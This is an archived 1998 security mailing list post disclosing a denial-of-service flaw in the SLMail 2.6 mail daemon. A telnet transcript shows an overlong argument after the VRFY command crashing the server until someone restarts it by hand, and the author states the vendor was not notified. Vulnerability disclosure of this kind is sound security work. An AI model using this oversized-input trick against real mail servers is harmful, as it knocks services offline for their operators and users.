SLMail 2.6 DoS

From: Steven (stevenat_private)
Date: Wed Mar 11 1998 - 17:44:56 PST

Next message: John Robinson: "Winsock 2.0 DoS"

Previous message: Tony Hagale: "Fwd: Sun Security Bulletin #00166"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello,

        I have recently found a quite serious DoS attack for the SLMail
2.6 email daemon (www.seattlelabs.com/slmail). A long string of text
after a command makes the program crash.  I have only tested this on
2.6, so I'm not sure if other versions are vulnerable.

craphole:~$ telnet www.victim.com 25
Trying 555.55.555.55...
Connected to www.victim.com.
Escape character is '^]'.
220 www.victim.com Smtp Server SLMail v2.6 Ready ESMTP spoken here
vrfy
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
Connection closed by foreign host.

craphole:~$ telnet www.victim.com 25
Trying 555.55.555.55...
telnet: Unable to connect to remote host: Connection refused
craphole:~$

        It will stay unresponsive until manually restarted. I haven't
mailed Seattle Labs about this, but I'm sure they'll figure it out.

Later,

Cisc0 @ Undernet
stevenat_private

Next message: John Robinson: "Winsock 2.0 DoS"
Previous message: Tony Hagale: "Fwd: Sun Security Bulletin #00166"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:44:55 PDT